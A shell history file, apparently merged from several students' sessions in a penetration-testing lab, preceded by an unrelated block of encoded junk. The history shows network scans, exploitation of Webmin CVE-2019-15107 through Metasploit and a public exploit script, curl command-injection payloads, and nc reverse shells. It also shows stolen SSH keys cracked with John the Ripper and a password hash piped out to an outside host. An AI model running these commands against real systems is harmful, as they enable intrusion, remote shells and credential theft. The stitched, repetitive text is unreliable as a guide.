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
clear
john --wordlist=/usr/share/wordlists/rockyou.txt key
/usr/share/john/ssh2john.py key
/usr/share/john/ssh2john.py key > key2
john key@
john key2
john --wordlist=/usr/share/wordlists/rockyou.txt key@
john --wordlist=/usr/share/wordlists/rockyou.txt key2
cp key ./.ssh/id_rsa
cd
cd .ssh
cat id_rsa
ssh 10.1.17.4
ssh eve@sh 10.1.17.4
ssh eve@10.1.17.4
ls
openssl
openssl rsa -in id_rsa -out key
ls
cat key
mv key id_rsa
ssh eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
nmap -A 172.18.1.5
msf
metasploit
msfconsole
search webmin 1.920
search cve:2019-15107
use exploit/unix/webapp/webmin_backdoor
show options
set TARGETURI=172.18.1.5:10000
set TARGETURI 172.18.1.5:10000
run
show options
set TARGETURI /
set RHOST 172.18.1.5
run
set LHOST 0.0.0.0
run
show options
search edb:47230
search webmin
banner
info
connect
run
show options
set LHOST 10.1.135.83
run
ls
pwd
ls
ls
cat ssh2john.py
python ssh2john.py
connect
touch r.txt
cp /tmp.r.txt rsa_d
ls
python ssh2john.py rsa_d
python ssh2john.py rsa_d > john_rsa
john john_rsa
john rsa_d
john john_rsa
python ssh2john.py /tmp.k > rsa2
cat rsa_d
john ---h
john -h
ls
ls Documents/m
ls Documents/
ls Documents/ -laR
ls
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt
john --show
ls
john rsa_d --show
ls
ls fasttrack.txt
ls -l
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt.gz
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt
tar -xvf rockyou.txt.gz
head rockyou.txt
john rsa2 --wordlist /usr/share/wordlists/rockyou.txt
ls
john john_rsa
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt
john
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt --show
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt --show=left
john john_rsa --wordlist /usr/share/wordlists/rockyou.txt --show=right
john john_rsa --show --wordlist /usr/share/wordlists/rockyou.txt
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --show
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa
less rockyou.txt
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH
ls
john --wordlist /usr/share/wordlists/rockyou.txt rsa_d --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt rsa2 --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt rsa_d --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH
john --show
john --show john_rsa
python ssh2john.py r.txt > rsa3
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH --verbose
john
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH --verbose
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SS
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa --format=SSH
less rockyou.txt
john --wordlist /usr/share/wordlists/rockyou.txt john_rsa
show rsa_
show rsa_d
john --show rsa_d
python ssh2john.py /tmp/id_rsa hash
python ssh2john.py /tmp/id_rsa > hash
john --wordlist /usr/share/wordlists/rockyou.txt hash
john --wordlist /usr/share/wordlists/rockyou.txt hash --rules
john --show hash
john --wordlist /usr/share/wordlists/rockyou.txt hash --rules
john --wordlist=all.lst hash
sudo john
john --show hash --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt hash --rules
john --show hash --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt hash
john --show hash --format=SSH
john --wordlist /usr/share/wordlists/rockyou.txt hash
ls
echo '!hellokitty!!' > wl.txt
john --wordlist wl.txt hash
ls
john --show hash
echo -n '!hellokitty!!' > wl.txt
john --wordlist wl.txt hash
john --show hash
john --show --format=SSH                             hash
cat /tmp/id_rsa
python ssh2john.py /tmp/id_rsa
ssh-add /tmp/id_rsa
ssh-add id_rsa
la
ls -la
python ssh2john.py id_rsa > hash
john --wordlist /usr/share/wordlists/rockyou.txt
john --show id_rsa
john --show hash
john --wordlist /usr/share/wordlists/rockyou.txt hash
john --show hash
john --wordlist /usr/share/wordlists/rockyou.txt --fork 4 hash
john --wordlist /usr/share/wordlists/rockyou.txt --fork=4 hash
john --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 hash
ssh-add id_rsa
ssh eve@10.1.17.4
cp id_rsa .ssh/id_rsa
ssh eve@10.1.17.4
ls
ls -a
chown 0044
chown 0044 id_rsa
ssh-add id_rsa
ssh eve@10.1.17.4
ls
cd top-secret/
ls
cat flag
cat flag.txt
ip a
ping ..
ping 8.8.8.8
namp 172.18.1.5 -A
nmap 172.18.1.5 -A
systemctl start ssh
ssh -R blabla:22:127.0.0.1:22 serveo.net
curl 172.18.1.5:10000
ssh root@127.0.0.1
ssh -R blabla:22:127.0.0.1:22 serveo.net
ssh -R 6666:127.0.0.1:22 serveo.net
vim /etc/ssh/sshd_config
systemctl restart ssh
vim
ll
nmap -p 10000 -A 172.18.1.5
msfconsole
search CVE-2019-15107
use exploit/unix/webapp/webmin_backdoor
show
show options
set LHOST 172.18.1.5
show options
back
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
run
set LPORT 6666
run
set LHOST 0.0.0.0
run
sessions -i
sessions
ip a
show options
set LHOST 192.168.130.188
set SRVHOST 192.168.130.188
run
msfconsole
use exploit/unix/webapp/webmin_backdoor
show options
set RHOSTS 172.18.1.5
run
ip r
set LHOST 10.1.135.83
run
nc -l -p 7777
ll
ls
cd/
cd /
ls
cd /root
ls
ls -hlA
ll
ls
ls .ssh
cat .ssh/autorized_keys
cat .ssh/authorized_keys
history
ls
ip a
ps aux
ps aux
w
ps aux
ps aux | less
ping 10.1.135.83
s
s
s
s
s
s
s
s
sss
ls
ssh -R 6666:127.0.0.1:22 serveo.net
ls
ip a
nmap
cd /root
ls
apt udpate
apt update
apt install nmap
cat /etc/crontab]
cat /etc/crontab
cat /etc/cron.*/*
cd /
cd /etc
ls -hlA
ls -hlA cron*
crontab -l
cat /etc/passwd
cd /home
ls
ls -hlA *
cd eve
ls -hlA
ls -hlA .ssh
cat .ssh/*
ls
ls -hlA
cd debian
cd ../debian
ls -hlA
ls -hlA .ssh
cat .ssh/authorized_keys
cd .ansible
ls
ls -hlA
cd tmp
ls -hlA
cd ..
ls -hlA
cd ..
ls -hlA
cat *
cat .*
ls -hlA
cd ..
ls -hlA
ls -hlA *
cd eve
cat .bash_history
ls -hlA
nmap
ls -hlA
cat .bash_history
su eve
ls -hlA
ssh eve@10.1.17.4
exit
ls
ls -hlA
cp .ssh/* /root/.ssh/
cd
ls -hlA .ssh
cd /home/eve
ls -hlA
cat .bash_history
ls -hlA
ls -hlA /tmp
alias ll='ls -hlA'
ll
cd ..
ll
ll *
cd ..
ll
ll root
cat root/.bash_history
ll
cd /var/
ll
cd webmin
ll
cd ..
cd ..
ll
ll media
ll opt
ll srv
cd var
ll
cd log
ll
cat syslog
ll
zcat syslog.1
cat syslog.1
cd /etc/ansible
cd /etc
ll
ll ssh
ll
cat sudoers
cd
ll
ll
alias ll='ls -hlA'
ll
ll
cd
ll
cd .ssh
ll
cat id_rsa
ll
alias ll='ls -hlA'
ll
cd Desktop/
ll
vim id_rsa
gpg2john id_rsa
apt install ssh2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
chmod +x ssh2john.py
./ssh2john.py id_rsa
./ssh2john.py id_rsa > x
ll
ll /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt x
ll
ll
cd ..
cat /home/eve/.bash_history
ssh eve@10.1.17.4
ls -hlA
alias ll='ls -hlA'
cd /tmp
ll
ll
cd
history
cat /home/eve/.bash_history
ssh eve@10.1.17.4
alias ll='ls -hlA'
ll
cd top-secret
ll
cat flag.txt
ll
cd ..
ll
uname -a
sudo -l
ll
cat /etc/passwd
w
ll
ll top-secret/
cat top-secret/flag.txt
ssh -R 6666:127.0.0.1:22 serveo.net
ssh -R blabla:22:127.0.0.1:22 serveo.net
ssh -R 6666:127.0.0.1:22 serveo.net
ll
cd /
ll
w
ll opt
ll srv/
cat /etc/passwd
cat /etc/cron*
ll /tmp/cron*
ll /etc/cron*
ll
ip a
ssh -R 6666:127.0.0.1:22 serveo.net
ll
uname -a
cat /etc/api/sources.list
cat /etc/apt/sources.list
ll
ifconfig
nmap -sv 172.18.1.5
nmap -sV 172.18.1.5
curl 172.18.1.5:10000
curl 172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|whoami&old=foo&new1=bar&new2=bar' -H"Referer: http>//172.18.1.5:10000"
nmap -A 172.18.1.5
nmap -A -p 1-65536
nmap -A -p 1-65536 172.18.1.5
nmap -A -p 1-65535 172.18.1.5
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set RHOST 172.18.1.5
set RHOSTS 172.18.1.5
ip a
set LHOST 10.1.135.83
nmap -A 10.1.17.4
vim key
ssh2john
john key
cat key | nc hxx.cz 8080
locate *2john
/usr/share/john/ssh2john.py key > key.hash
john key.hash
cat key.hash
run
sessions -l
sessions -h
sessions -u 2
sessions -l
echo 'eve:$6$eDIUpTqNub/vHNdW$1OxDFqCfsUBdhYWqY6f2P37WcGUznmP7BCEmEADlIkvxkpjzOy3zv3MJTxAC53a1oPtoBpvzRksNCzO4pppiy.:18451:0:99999:7:::' |nc hxx.cz 8080
echo 'eve:$6$eDIUpTqNub/vHNdW$1OxDFqCfsUBdhYWqY6f2P37WcGUznmP7BCEmEADlIkvxkpjzOy3zv3MJTxAC53a1oPtoBpvzRksNCzO4pppiy.:18451:0:99999:7:::' | nc hxx.cz 8080
sessions -i 3
run
sessions -l
sessions -U 4
sessions -u 4
ls
./ssh2john.py key > key2.hash
john key2.hash
locate *ockyou*
john --wordlist=/usr/share/wordlists/rockyou.txt key2.hash
ssh -h
ssh -i key eve@10.1.17.4
chmod 600 key
ssh -i key eve@10.1.17.4
ssh -i key eve@10.1.17.4
ls
cd top-secret/
ls
cat flag.txt
cat /usr/share/wordlists/rockyou.txt |wc
nmap 172.18.1.5
nmap 172.18.1.5
ls
metasploit
msf-console
sudo service postgresql start
sudo msfdb init
msfconsole
search webmin
use 
use 2
check
show options
set RHOST 172.18.1.5
set RPORT 10000
check
search webmin
use ~
use 3
search webmin
use 3
show options
set SRVHOST 172.18.1.5
check
set SRVHOST 0.0.0.0
set RHOST 172.18.1.5
check
exploit
set LHOST 147.251.83.13
exploit
set LPORT 12345
exploit
set LHOST 100.100.100.2
exploit
set LPORT 
set LPORT 4444
exploit
set LHOST 10.1.135.83
nmap 10.1.17.4
ssh 10.1.17.4
ssh eve@10.1.17.4
cd .ssh
ls
nano id_rsa
ssh-add id_rsaaaa
ssh_add id_rsa
ssh-add id_rsaa
ssh-add id_rsa
chmod #033[2~ id_rsa
exploit
chmod 600 id_rsa
ssh-add id_rsa
ssh-add id_rsa
ssh eve@10.1.17.4
ls
mv id_rsa ../id_rsa
cd ..
ll
ls
./ssh2john.py
./ssh2john.py id_rsa
./ssh2john.py id_rsa > hash
ls
joh hash --show
john hash --show
john hash --show
john hash --show
john hash
gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ssh eve@10.1.17.4
john --wordlist=/usr/share/wordlists/rockyou.txt hash > result
cat result
ssh eve@10.1.17.4
ssh eve@10.1.17.4
mv id_rsa .ssh/id_rsa
ssh eve@10.1.17.4
ssh eve@10.1.17.4
ls
cat top-secret
cd top-secret
ls -la
cat flag.txt
ls
ls
cat ssh2john.py
clear
ls
nmap
ifconfig
nmap 192.168.128.0
nmap 192.168.128.0/24
ifconfig
nmap 10.1.135.0/24
nmap 10.1.135.0/
nmap 10.1.135.0/16
ping 172.18.1.5
nmap 172.18.1.5
nmap -sV 172.18.1.5
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ls&old=foo&new1=bar&new2=bar' -H"Referer: http://172.18.1.5:10000"
curl http://172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar' -H"Referer: http://172.18.1.5:10000"
git clone https://github.com/jas502n/CVE-2019-15107
ls
cd CVE-2019-15107/
ls
python CVE_2019_15107.py
cat README.md
python CVE_2019_15107.py https://172.18.1.5:10000
python CVE_2019_15107.py https://172.18.1.5:10000 id
python CVE_2019_15107.py http://172.18.1.5:10000 ls
python CVE_2019_15107.py http://172.18.1.5:10000 pwd
ls /root
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root/
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root/; pwd
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/; pwd
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/; ls
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/; ls
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/; ls -al
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root/;
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root/ pwd;
python CVE_2019_15107.py http://172.18.1.5:10000 ls -al /root/;
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'cd /root; ls';
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'cd /root; ls -al';
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'cd /root; pwd';
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'ls';
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'pwd';
python CVE_2019_15107.py http://172.18.1.5:10000 bash -c 'pwd'
python CVE_2019_15107.py http://172.18.1.5:10000 /bin/bash -c 'echo anal'
python CVE_2019_15107.py http://172.18.1.5:10000 pwd
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/ & ls
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/ & echo hello
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root/ & echo hello'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root/ && echo hello'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root/ && pwd'
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/ && pwd
python CVE_2019_15107.py http://172.18.1.5:10000 cat /root/flag
python CVE_2019_15107.py http://172.18.1.5:10000 pwd
python CVE_2019_15107.py http://172.18.1.5:10000 cd /root/
python CVE_2019_15107.py http://172.18.1.5:10000 pwd
python CVE_2019_15107.py http://172.18.1.5:10000 touch file
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root/ > file
python CVE_2019_15107.py http://172.18.1.5:10000 cat file
python CVE_2019_15107.py http://172.18.1.5:10000 ls
ls
python CVE_2019_15107.py http://172.18.1.5:10000 pwd
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /root'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /root/WARNING-READ-ME.txt'
python CVE_2019_15107.py http://172.18.1.5:10000 'find *.txt'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root/ && pwd'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root/; pwd'
python CVE_2019_15107.py http://172.18.1.5:10000 'cd /root; pwd'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/alive'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/alice'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/bob'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/eve'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/eve/.ssh'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id_rsa'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/eve/.ssh'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id_rsa.pub'
ls
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home/debian'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/debian'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/debian/.ansible'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home/debian/.ansible/tmp'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /root'
python CVE_2019_15107.py http://172.18.1.5:10000 'find -L / *.txt'
python CVE_2019_15107.py http://172.18.1.5:10000 'find -L / -name "*.txt"'
ls
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /root'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -al /home'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /home'
ping 172.18.1.5
python CVE_2019_15107.py http://172.18.1.5:10000 'pwd'
nc -l 8080
python CVE_2019_15107.py http://172.18.1.5:10000 'nc -e /bin/sh 10.1.135.83 8080'
python CVE_2019_15107.py http://172.18.1.5:10000 'nc -e /bin/sh 10.1.135.83 8080'
ls
cd CVE-2019-15107/
python CVE_2019_15107.py http://172.18.1.5:10000 'nc -e /bin/sh 10.1.135.83 8080'
ls
cd CVE-2019-15107/
python CVE_2019_15107.py http://172.18.1.5:10000 'nc -e /bin/sh 10.1.135.83 8080'
aaaaaaaaaaa
ive had enough
help
please
i beg you
to je tak na picu lmao
cd ..
ls
python ssh2john.py
curl ipconfig.co
dig +short myip.opendns.com
nmap 172.18.1.5 -p 0-65535
nc 172.18.1.6:10000
nc 172.18.1.6 10000
wat
nc 172.18.1.5 10000
git clone https://github.com/jas502n/cve-2019-15107
git clone https://github.com/jas502n/cve-2019-15107
python CVE_2019_15107.py http://172.18.1.5:10000
python CVE_2019_15107.py http://172.18.1.5:10000 id
python CVE_2019_15107.py http://172.18.1.5:10000 ls
python CVE_2019_15107.py http://172.18.1.5:10000 ls /root
python CVE_2019_15107.py http://172.18.1.5:10000 'ls /root'
python CVE_2019_15107.py http://172.18.1.5:10000 'cat /root/WARNING-READ-ME.txt'
python CVE_2019_15107.py http://172.18.1.5:10000 'ls -l /root'
ip a
nmap 172.18.1.5
nmap 172.18.1.0/24
nmap 172.18.0.0/16
nmap 172.18.0.0/16
msf
metaflac
msfconsole
use exploit/linux/http/webmin_backdoor
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show targets
set target 0
set target 1
show options
set RHOSTS 172.15.1.5
set RPORT 10000
show
show options
exploit
quit
msfconsole
search webmin
use exploit/unix/webapp/webmin_show_cgi_exec
show
show targets
show options
set RHOST 172.18.1.5
set USERNAME dmin
set USERNAME admin
exploit
set PASSWORD admin
exploit
ip a
use exploit/unix/webapp/webmin_backdoor
show targets
set TARGET 0
show options
set LHOST 10.1.135.83
set RHOST 172.18.1.5 
exploit
set TARGET 1
ssh eve@10.1.17.4
man xclip
xclip -selection c -o > .ssh/id_rsa
vim .ssh/id_rsa
vim .ssh/id_rsa.pub
ssh eve@10.1.17.4
chmod 0600 /root/.ssh/id_rsa
ssh eve@10.1.17.4
ssh eve@10.1.17.4
nc -l 12345
ip a
vim shadow
vim passwd
unshadow shadow passwd
unshadow passwd shadow
unshadow passwd shadow > mypasswd
john mypasswd
base64 -d
cat .ssh/id_rsa
cat .ssh/id_rsa.pub
ls
cp ~/.ssh/id_rsa
cp ~/.ssh/id_rsa id_rsa
localte ssh2john.py
locate ssh2john.py
python ssh2john.py id_rsa
python ssh2john.py id_rsa > ssh.john
john ssh.john
john ssh.john
cat .john/john.rec
fg
john ssh.john
wget https://github.com/praetorian-code/hob0rules/blob/master/wordlists/rockyou.txt.gz
cat rockyou.txt.gz
locate rockyou
john ssh.john -wordlist /usr/share/wordlists/rockyou.txt
john ssh.john -wordlist /usr/share/wordlists/rockyou.txt
ls /usr/share/wordlists/rockyou.txt
ll /usr/share/wordlists/rockyou.txt
ls -l /usr/share/wordlists/rockyou.txt
john ssh.john
locate rocky
ls /usr/share/wordlists/
cd me
ls /usr/share/wordlists/metasploit
cd
locate ssh2john.py
diff ssh2john.py /usr/share/john/ssh2john.py
ll
ls
python /usr/share/john/ssh2john.py id_rsa > ssh2.jogn
diff ssh.john ssh2.jogn
john ssh.john --wordlist=/usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep '!hellokitty!!'
cat /usr/share/wordlists/rockyou.txt | grep -n '!hellokitty!!'
ssh eve@10.1.17.4
nice
ls
cd top-secret/
ls
cat flag.txt
ll /usr/share/wordlists/rockyou.txt
ls -l /usr/share/wordlists/rockyou.txt
exit
john ssh.john -wordlist=/usr/share/wordlists/rockyou.txt
john ssh.john -wordlist /usr/share/wordlists/rockyou.txt
nmap 172.18.1.5
nmap 172.18.1.5
nmap -p- 172.18.1.5
ssh 172.18.1.5
nmap -A 172.18.1.5
msfconsole
help
search webmin
use 3
show
show all
show options
set RHOSTS 172.18.1.5
show options
exploit
ip
ip address
set LHOST 10.1.135.83
exploit
search shell_to_meterpreter
use 0
sessions -l
show options
set SESSION 2
run
sessions 2
sessions -
sessions 2
search webmin
use 3
exploit
ping rm /home/eve/* -rf
logout
ping 10.1.18.22
ping 10.1.18.22
exit
show options
ssh 172.18.1.5
ls ~/.ssh
ssh-keygen
ls
ls ~/.ssh
cd ~/.ssh
ls
cat id_rsa.pub
ssh eve@172.18.1.5
sessions 5
ssh eve@10.1.17.4
ls
ls -la
cd .ssh
ls
cat id_rsa
ls
vim key
ssh eve@10.1.17.4 cat ~/.ssh/id_rsa
ssh eve@172.18.1.5 cat ~/.ssh/id_rsa
ssh eve@172.18.1.5 cat '~/.ssh/id_rsa'
ssh eve@172.18.1.5 cat '~/.ssh/id_rsa' > key
ls
.\ssh2john.py
./ssh2john.py
./ssh2john.py key > crack.txt
cat crack.txt
ls
cd Desktop/
ls
ls -la
cd ..
ls
john crack.txt
cd /usr/share
ls
cd wordlists/
ls
john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
ssh eve@10.1.17.4
exit
ls
cd top-secret/
ls
cat flag.txt
nmap -h
nmap -p 1-65535 172.18.1.5
nmap -A -p 10000 172.18.1.5
msfconsole
use exploit/linux/http/webmin_backdoor
use exploit/unix/http/webmin_backdoor
search webmin
use exploit/unix/webapp/webmin_backdoor 
show options
set lhost 10.1.135.83
set rhosts 172.18.1.5
show targets
show options
exploit 
set srvhost 10.1.135.83
exploit 
show options
set ForceExplot
set ForceExploit
set ForceExploit true
exploit
nmap 172.181.1.5 -p-
nmap 172.181.1.5 -p- -Pn
nmap 172.18.1.5 -p-
nmap 172.18.1.5 -p- -A
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
ip a
set LHOST 10.1.135.83
show options
set RHOSTS 172.18.1.5
exploit
search web
search web_de
setg LHOST 10.1.135.83
use exploit/multi/script/web_delivery
show optins
show otions
show options
set target linux
show options
show targets
set target 
show options
show targets
set target 
set target 6
show options
set payload linux/x64/meterpreter/reverse_tcp 
show options
run
use exploit/unix/webapp/webmin_backdoor
run
set LPORT 4445
run
nmap 172.18.1.5/12 -p-
sessions 3
sessions
sessions -u ~
sessions -u 3
sessions 3
nmap 172.18.1.5/24 -p-
sessions 4
sessions
nmap 172.18.1.2
ip a
ip route
sessions 3
sessions 4
sessions
nmap 81.2.195.254
curl 81.2.195.254
ping 10.1.18.22
nmap 10.1.18.22
nmap 10.1.17.4
cd .ssh
ls
cat id_rsa
john id_rsa
ssh2john
locate ssh2john
cd
python ssh2john.py
python ssh2john.py .ssh/id_rsa
python ssh2john.py .ssh/id_rsa > eve
john eve
locate rockyou
john eve --wordlist=/usr/share/wordlists/rockyou.txt
ls
ssh eve@10.1.17.4
chmod 600 .ssh/id_rsa
ssh eve@10.1.17.4
ls -la
cd top-secret/
ls
cat flag.txt
sessions 5
nmap -sV 172.18.1.5
metasploit
msfconsole -h
msfconsole
use auxiliary/scanner/portscan/tcp
show options
set RHOSTS 172.18.1.5
set PORTS 1000
run
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RPORT 1000
set RHOST +\xc3172.18.1.5
set LHOST +10.1.135.83
set RHOST 172.18.1.5
check
exploit
set LHOST 10.1.135.83
set RPORT 1000
check
run
exit
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
su root
cd /root/
ls
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
run
ipconfig
ifconfig
ip a
clear
nmap --help
nmap 172.18.1.5
nmap 172.18.1.5 -sV
nmap -sV
nmap -sV 172.18.1.5
clear
nmap -sV 172.18.1.5
ssh root@172.18.1.5
search vsftpd
msfconsole
show
msfcli exploit/unix
exit
msfconsole -q
ls
use exploit/unix
exit
show options
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
run
exit
ls
nano ssh2john.py
ls
clear
ls
pwd
ping 172.18.1.5
ping --help
ping -a
ping -a 192.168.0.1
curl 172.18.1.5
